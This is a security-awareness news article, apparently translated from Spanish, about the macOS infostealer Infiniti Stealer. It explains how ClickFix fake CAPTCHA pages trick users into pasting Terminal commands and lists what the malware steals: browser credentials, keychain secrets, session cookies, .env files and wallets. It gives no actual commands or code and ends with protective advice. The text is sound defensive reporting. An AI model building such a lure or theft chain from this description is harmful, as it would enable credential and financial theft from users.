For years, many Mac users have lived with the idea that macOS was almost immune to malwareIt wasn't entirely true, but the smaller market share compared to Windows meant many cybercriminals looked the other way. That period of relative calm is coming to an end, and the emergence of Infiniti Stealer makes that quite clear.
This new malicious code is designed to stealing sensitive information on Mac computers Using social engineering techniques that bear little resemblance to the old viruses of yesteryear, Infiniti Stealer can steal passwords, personal data, and even cryptocurrency wallets without the user noticing anything unusual. Through fake verification pages, automated scripts, and evasion mechanisms, the user will be unaware of anything amiss.
The end of the false sense of security on macOS
For a long time, the Mac community took it for granted that Virus problems were a Windows issuePart of that confidence came from macOS's own security design, but also from a more practical reason: there were fewer users, and therefore less interest for attackers.
That reality has completely changed. Apple has been gaining ground in the European market, especially among professionals, freelancers and companiesAnd that has made Mac computers a very attractive target. Sectors such as design, software development, finance, and digital marketing work daily with high-value information.
Meanwhile, security researchers have been detecting a significant increase in infostealer-type malware on macOSThis type of threat focuses on stealing credentials, session cookies, card data, and cryptocurrency assets to quickly convert them into cash.
Furthermore, modern Mac malware is no longer limited to basic tricks. It's increasingly common to see techniques like fileless execution, using AppleScript and the exploitation of native system tools to remain undetected. All of this allows infections to remain active for weeks or months without raising suspicion.
Infiniti Stealer: the new infostealer specializing in Macs
In this context, Infiniti Stealer bursts onto the scene, a malware specifically designed for macOS which focuses on data theft. The threat has been analyzed in detail by researchers at Malwarebytes Labs, who have identified a very specific attack pattern.
Infiniti Stealer combines two key elements: on the one hand, the distribution technique known as ClickFix, already used previously in Windows and now adapted to the Apple ecosystem; on the other hand, a malicious payload written in Python and compiled with Nuitka, which ends up generating a native binary for Mac that is difficult to detect.
One of the most worrying aspects is that It does not rely on complex technical vulnerabilitiesbut rather to deceive the user. The campaign relies on pages that appear to be legitimate verification systems, similar to the well-known CAPTCHAs or Cloudflare controls, which helps to lower users' guard.
Malwarebytes highlights that Infiniti Stealer demonstrates how Strategies that worked on Windows are migrating to macOSThis is a clear sign that criminals no longer consider Apple's system a low-risk target, especially in Europe, where Mac adoption in professional environments continues to grow.
The ClickFix trap and fake CAPTCHAs
The heart of the attack lies in the technique. ClickFix applied to alleged human verificationsThe process begins when the user arrives at a malicious page that impersonates a security system: at first glance, it seems like a simple test to confirm that it is not a bot.
Instead of asking the user to check boxes or identify images, the page displays a message requesting copy and paste a command in the macOS Terminalunder the pretext that it's an additional verification necessary to proceed. Everything is presented in a relatively convincing way, making it easy for more than one person to fall into the trap.
That supposed verification command is, in reality, malicious code that downloads and executes the payload from Infiniti Stealer. Once pasted into the Terminal and executed, the system starts downloading the necessary files, usually using standard tools like curl or bash scripts.
Experts remind us that No legitimate CAPTCHA or Cloudflare requires copying and pasting commands. From a website to the Terminal. That simple detail should be enough to set off all the alarms, but the combination of haste and confidence in macOS security means that many users don't question it.
From command to data theft: this is how Infiniti Stealer operates
Once the user executes the command provided by the fake verification, a relatively structured chain of actions is set in motion. First, a payload is downloaded that generates a native binary of around 8,6 MBdesigned to work independently on macOS without relying on external components.
That binary file is responsible for running in the background, avoiding displaying visible windows or notifications to avoid raising suspicion. From that moment on, the computer appears to function normally, but the malware begins to track and collect information.
Among the main objectives are the Chromium and Firefox-based browserswhich store a large amount of credentials, cookies, and autofill data. It also targets the macOS keychain, where passwords, certificates, and other sensitive secrets are stored.
Additionally, the Infiniti Stealer can capture active session tokens and valid cookiesThis allows attackers to access online accounts without needing to enter a username and password, even bypassing two-step authentication systems when the session is already open.
In the case of advanced users and businesses, malware pays special attention to files such as .env and other configuration files These files often contain API keys, database credentials, and cloud service access data. This makes developers and administrators a particularly attractive target.
Technical capabilities and information exfiltration
From a technical perspective, the Infiniti Stealer stands out for combining a native approach in macOS with evasion techniquesGenerating a custom binary complicates the work of some security solutions that focus on scripts or more well-known behaviors.
The malware is capable of extracting data from a wide range of browsers, covering a very significant portion of actual usage in Europe. This is compounded by access to... macOS keychain already stored certificates, a critical source of information for engaging professional services.
Once collected, the stolen data is sent to servers controlled by the attackers through encrypted connectionsThis use of secure channels makes it difficult for traditional tools to easily detect exfiltration, as the traffic is mixed in with other legitimate communications.
In some scenarios, the combination of credentials, tokens, and API keys allows attackers to pivot from a single compromised Mac. towards complete enterprise infrastructurescode repositories, administration panels, and even financial services linked to the affected team.
A change of focus: Mac is no longer a minor target
Cases like the Infiniti Stealer confirm something that security analysts have been warning about for some time: macOS is no longer a secondary targetThe growing number of users and the presence of Macs in key departments make the potential profit for criminals very high.
In Europe and Spain, the use of Macs has become widespread. consultancies, creative studios, fintech, technology startups and professional officesIn all these environments, confidential documents, access to corporate platforms, and bank accounts are handled.
The expansion of cryptocurrencies and digital financial services has added another incentive. Many users save wallets, seed phrases, and exchange access on their equipment, which fits perfectly with the type of information an infostealer is looking for.
At the same time, the macOS development ecosystem is enormous. Programming tools, package managers, and cloud deployment platforms are used daily from Mac computers, so Compromising a single laptop can open the door to an entire infrastructure.
What can Mac users do to protect themselves?
Although Infiniti Stealer is a serious threat, there are several measures that can significantly reduce the risk. The first, and perhaps most important, is Never run commands in the Terminal if you don't fully understand what they do.especially when they come from a website.
Any site that asks you to copy and paste text into the Terminal as part of a supposed security check should be considered suspicious. highly suspiciousLegitimate CAPTCHAs do not require this type of manual action, neither in Spain nor in any other country.
It is also advisable to take extra precautions when downloading software or using unknown servicesWhenever possible, it is advisable to use official sources, verified app stores, and trusted providers.
On a technical level, it can be useful to supplement macOS's built-in protections with specialized security solutions that monitor anomalous behavior, including Terminal activity and the appearance of new binaries on sensitive routes.
Steps to take if an Infiniti Stealer infection is suspected
If there is reasonable doubt that you executed one of these commands or visited a suspicious verification page, it is important to act calmly but quickly. Researchers recommend stop using the equipment for sensitive activitiessuch as online banking, corporate email, or cryptocurrency management.
Next, it is preferable to change the passwords from another clean devicePrioritize your primary email, banking apps, work services, and Apple ID. It's also a good idea to review your open sessions and close any that aren't needed.
In business environments, it may be necessary Inform the IT department or the security officer so they can check for unusual access, changes to repositories, or strange activity in corporate accounts.
According to experts, the key is to assume that, after an infection of this type, The credentials stored on the device may be considered compromised.Hence the importance of revoking them, rotating them, and reviewing access logs on all important services.
Everything surrounding Infiniti Stealer reinforces one clear idea: macOS remains a robust system, but it no longer exists in a bubble isolated from malware. The rise of infostealers targeting Mac users in Europe demonstrates that attackers have found these machines to be a highly valuable source of data. Understanding how techniques like ClickFix work, being wary of any verification that requires using Terminal, and strengthening everyday security habits have become essential to keeping passwords, online accounts, and digital assets safe on Apple computers.
